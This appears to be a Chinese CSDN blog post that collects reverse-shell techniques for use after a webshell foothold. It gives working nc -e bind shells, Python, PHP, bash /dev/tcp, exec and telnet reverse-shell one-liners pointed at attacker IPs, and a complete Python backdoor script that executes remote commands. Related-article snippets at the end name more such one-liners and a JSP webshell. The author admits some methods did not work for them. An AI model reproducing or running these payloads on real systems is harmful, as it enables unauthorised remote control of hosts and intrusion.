常用的反弹shell总结

最新推荐文章于 2025-04-08 10:40:52 发布
最新推荐文章于 2025-04-08 10:40:52 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: web 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/105077414
版权
本文详细介绍如何使用nc、python、php等工具实现反弹shell,包括安装nc完整版、使用nc监听及发布bash、python脚本获取shell、php反弹shell等方法,为渗透测试提供多种远程控制手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nc反弹shell

我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。

这里需要注意一点默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以我们需要手动下载二进制安装包,自己动手丰衣足食了,具体过程如下。

安装nc完整版

# 第一步:下载二进制netc安装包
root@home-pc# wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz 
# 第二步:解压安装包
root@home-pc# tar -xvzf netcat-0.7.1.tar.gz
# 第三步:编译安装
root@home-pc# ./configure
root@home-pc# make
root@home-pc# make install
root@home-pc# make clean
# 具体编译安装过程可以直接参见INSTALL安装说明文件内容...
# 第四步:在当前目录下运行nc帮助
root@home-pc:/tmp/netcat-0.7.1# nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere:  nc [options] hostname port [port] ...
listen for inbound:    nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere:   nc -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close                close connection on EOF from stdin
-e, --exec=PROGRAM         program to exec after connect
-g, --gateway=LIST         source-routing hop point[s], up to 8
-G, --pointer=NUM          source-routing pointer: 4, 8, 12, ...
-h, --help                 display this help and exit
-i, --interval=SECS        delay interval for lines sent, ports scanned
-l, --listen               listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT  forward local port to remote address
-n, --dont-resolve         numeric-only IP addresses, no DNS
-o, --output=FILE          output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM       local port number
-r, --randomize            randomize local and remote ports
-s, --source=ADDRESS       local source address (ip or hostname)
-t, --tcp                  TCP mode (default)
-T, --telnet               answer using TELNET negotiation
-u, --udp                  UDP mode
-v, --verbose              verbose (use twice to be more verbose)
-V, --version              output version information and exit
-x, --hexdump              hexdump incoming and outgoing traffic
-w, --wait=SECS            timeout for connects and final net reads
-z, --zero                 zero-I/O mode (used for scanning)
Remote port number can also be specified as range.  Example: '1-1024'

至此我们已经安装完成原生版本的 netcat工具,有了netcat -e参数,我们就可以将本地bash完整发布到外网了。

测试

开启本地8080端口监听,并将本地的bash发布出去。

root# nc -lvvp 8080 -t -e /bin/bash

另外一台目标机连接到这台靶机的8080端口

nc [靶机ip] 8080
在这里插入图片描述

python反弹shell

在渗透机上执行监听端口的命令:

nc -lvp 1234

在靶机上执行如下命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.105",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

使用python脚本来获取shell

# 1.编写usage函数
# 2.利用getopt模块从命令行获取参数值
# 3.区分客户端和服务端
# 4. 定义客户端代码,发送服务端命令行的回显内容
# 5. 定义服务端代码,接收命令,发动执行命令后的结果给客户端
# 6. 定义命令执行函数,执行客户端发送的命令
import socket
import getopt #该模块用来获取命令行模块
import sys
import subprocess
from threading import Thread
def main():
    target=""
    port =0
    listen =False
    help = False
    # 2. 利用getopt模块从命令行获取参数值
    opts,args =getopt.getopt(sys.argv[1:],"t:p:hl")
    for o,a in opts:
        if o=="-t":
            target=a
        elif o=="-p":
            port=int(a)
        elif o=="-h":
            help=True
        elif o=="-l":
            listen=True
    if help:
        usage()
    # 3.区分客户端和服务端
    elif not listen:
        client_handle(target,port)
    else:
        server_handle(port)
# 4.定义客户端代码,发送命令,接收服务端命令行的回显内容
def client_handle(target,port):
    client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    client.connect((target,port))
    while True:
        recv_len=1
        response="".encode("utf-8")
        while recv_len:
            data=client.recv(4096)
            recv_len=len(data)
            response+=data
            if recv_len<4096:
                break
        print(response.decode('gbk'),end="")

        # 接收命令
        buffer = input("") # str 我们输入的是字符串内容
        buffer+="\n"
        client.send(buffer.encode('utf-8')) #转化为bytes类型用于传输

# 5. 定义服务端代码,接收命令,发送执行命令后的结果给客户端

def server_handle(port):
    server =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server.bind(('0.0.0.0',port))
    server.listen(10) #定义监听的数量
    print("[*] Listening on 0.0.0.0: %d" % port)
    while True:
        client_socket,addr=server.accept()
        print("[*] Accept connection from %s:%d" % (addr[0],addr[1]))
        t=Thread(target=run_command,args=(client_socket,))
        t.start()
# 6.定义命令执行函数,执行客户端发送的命令
def run_command(client_socket):
    while True:
        client_socket.send(b"shell_>")
        cmd_buffer="".encode('utf-8') #bytes
        while b"\n" not in cmd_buffer:
            cmd_buffer+=client_socket.recv(1024)
        cmd_buffer = cmd_buffer.decode() # str
        try:
            out=subprocess.check_output(cmd_buffer,stderr=subprocess.STDOUT,shell=True)
            client_socket.send(out)
        except:
            client_socket.send(b"Failed to execute command.\r\n") #发送执行命令错误的信息



# 1.编写usage函数
def usage():
    print("help info:python backdoor.py -h")
    print("client: python backdoor.py -t [target] -p [port]")
    print("server: python backdoor.py -lp [port]")
    sys.exit()
if __name__=="__main__":
    main()

可以先放在自己的服务器里,然后再用wget下载

靶机执行:

python3 backdoor.py -lp 9999         # 进行监听端口

渗透机执行

python3 backdoor.py -t [靶机ip]  -p 9999

在这里插入图片描述

将shell转化为交互的tty;

python -c 'import pty;pty.spawn("/bin/bash")'

sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
[tom@redhat tmp]$ whoami 
whoami
tom
[tom@redhat tmp]$

php反弹shell

php -r '$sock=fsockopen("192.168.11.101",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

这个我暂时没有实验成功好像需要配置一些php的参数…

exec反弹

kevin@ubuntu:~$ exec 5<>/dev/tcp/192.168.11.101/4444
kevin@ubuntu:~$ cat <&5 | while read line; do $line 2>&5 >&5; done

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

在这里插入图片描述在这里插入图片描述

第二种方式:

kevin@ubuntu:~$ 0<&196;exec 196<>/dev/tcp/192.168.11.101/4444; sh <&196>&196 2>&196

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

bash反弹shell

bash -i >& /dev/tcp/192.168.11.101/44440>&1     #靶机

# 返回的执行命令所在的用户 shell 环境
root@kali:~# nc -nvlp 4444  		#渗透机监听端口
listening on [any] 4444 ...
Connection from 192.168.11.105:47430
fyz@ubuntu:~$

在这里插入图片描述在这里插入图片描述

telnet反弹

在攻击主机上打开两个终端分别监听 1234 和 4321端口,(确保端口开放,并且不被占用),得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果:

nc -lvvp 1234

nc -lvvp 4321

在目标主机上执行:

telnet 攻击主机ip 1234 | /bin/bash | telnet 攻击主机ip 4321

额,这个我好像也没试成功改天找找原因。。。

参考文章:
https://blog.csdn.net/qiuyeyijian/article/details/102993592?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
https://zhuanlan.zhihu.com/p/30170345?from_voters_page=true
https://blog.csdn.net/qq_38684504/article/details/90047213

Linux反弹shell
谢公子的博客
11-29 9619
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4945
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
反弹Shell总结
code_lab
09-05 826
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
渗透测试中反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-08 1018
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
部分常用反弹shell总结
来到了学渣的博客
02-21 488
为什么要使用反向 Shell 目标机器在一个不同(相对攻击者而言)的私有网络 目标机器的防火墙阻挡了所有入口连接(这种情况正向 Shell 是会被防火墙阻挡的) 由于一些原因,你的 Payload 不能绑定在应该绑定的端口的时候 你还不能确定应该选择反向 Shell 还是正向 Shell 的时候 监听端IP:192.168.0.99 Python 靶机端 python -c 'import s...
干货分享—Linux之渗透测试常用反弹shell方法总结!黑客技术零基础入门到精通实战教程!
白帽阿叁的博客
01-08 983
反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以办法避开防火墙和路由的一些限制的!
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1559
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 944
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
反弹shell总结
weixin_54626591的博客
08-31 1777
反弹shell总结
反弹shell的本质及实战
静水流深,沧笙踏歌
05-13 439
Linux反弹shell(一)文件描述符与重定向 Linux 反弹shell(二)反弹shell的本质 Linux下反弹shell几种方法学习总结
渗透测试--反弹shell(1)
weixin_43520214的博客
09-18 1234
反弹shell(Reverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
反弹shell的几种方法
星河梦瑾的博客
09-19 1306
目标服务器系统:Ubuntu、CentOS。 攻击者系统:Kali Linux,IP地址为 192.168.0.1,开放 4444 端口。 反弹Shell: 正向反弹Shell:目标机先执行 nc -lvp 4444 -e /bin/bash,然后攻击者使用 nc ip 4444 监听,可以实现Shell反弹。 反向反弹Shell:有多种方法,包括使用 bash、python、nc 本身,以及 php 来实现。每种方法都需要在攻击者机器上先使用 nc -lvp 端口号 进行监听
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4847
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
Linux常用反弹shell命令
m0_63200360的博客
04-24 3810
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
shell 函数return 返回值与echo内容的获取
小猪佩奇工作室
02-27 3461
写了个shell函数 调用完之后不知道怎么获取返回值,于是乎用上了 $(func_name) 来获取,然后踩了几个坑 查看教程之后发现要用 $? 来获取刚刚执行的函数的返回值, function func1() { echo 1 return 2 echo 3 } res=$(func1) echo $res 输出结果为 1 function func1() { echo 1 return 2 echo 3 } func1 echo $? res=$? echo $res 输出结果为
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 1645
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
url反弹shell
08-13
- *1* *2* *3* [内网渗透-常用反弹shell方法总结](https://blog.csdn.net/lza20001103/article/details/126558175)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值